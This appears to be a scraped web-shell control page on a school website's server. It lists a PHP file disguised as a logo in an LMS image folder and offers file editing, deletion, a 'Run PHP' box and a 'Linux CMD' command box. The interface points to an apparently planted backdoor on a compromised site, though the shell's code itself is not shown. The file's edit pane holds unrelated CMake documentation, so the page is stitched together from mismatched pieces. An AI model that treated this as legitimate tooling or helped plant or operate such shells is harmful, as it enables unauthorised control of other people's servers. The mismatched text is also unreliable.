๐ File Manager
๐
/
/
home
/
u449181296
/
domains
/
birulogi.smakpbaleendah.sch.id
/
public_html
/
lms
/
tukang-ngatur
/
assets
/
img
/
qr-logos
/home/u449181296/domains/birulogi.smakpbaleendah.sch.id/public_html/lms/tukang-ngatur/assets/img/qr-logos
Upload
Name
Size
Date
CHMOD
Action
โ FILE โ
logo_1773801405.php
6.73 KB
2026-03-18 02:36
644
(rw-r--r--)
Edit
|
Rename
|
Preview
|
Del
Edit
CMAKE_EXPORT_COMPILE_COMMANDS ----------------------------- .. versionadded:: 3.5 Enable/Disable output of compile commands during generation. If enabled, generates a ``compile_commands.json`` file containing the exact compiler calls for all translation units of the project in machine-readable form. The format of the JSON file looks like: .. code-block:: javascript [ { "directory": "/home/user/development/project", "command": "/usr/bin/c++ ... -c ../foo/foo.cc", "file": "../foo/foo.cc" }, ... { "directory": "/home/user/development/project", "command": "/usr/bin/c++ ... -c ../foo/bar.cc", "file": "../foo/bar.cc" } ] This is initialized by the :envvar:`CMAKE_EXPORT_COMPILE_COMMANDS` environment variable, and initializes the :prop_tgt:`EXPORT_COMPILE_COMMANDS` target property for all targets. .. note:: This option is implemented only by :ref:`Makefile Generators` and :ref:`Ninja Generators`. It is ignored on other generators. This option currently does not work well in combination with the :prop_tgt:`UNITY_BUILD` target property or the :variable:`CMAKE_UNITY_BUILD` variable.
Save
๐งช PHP Preview
<?php echo 'hello'; ?>
Run PHP
๐ฅ Linux CMD
Run CMD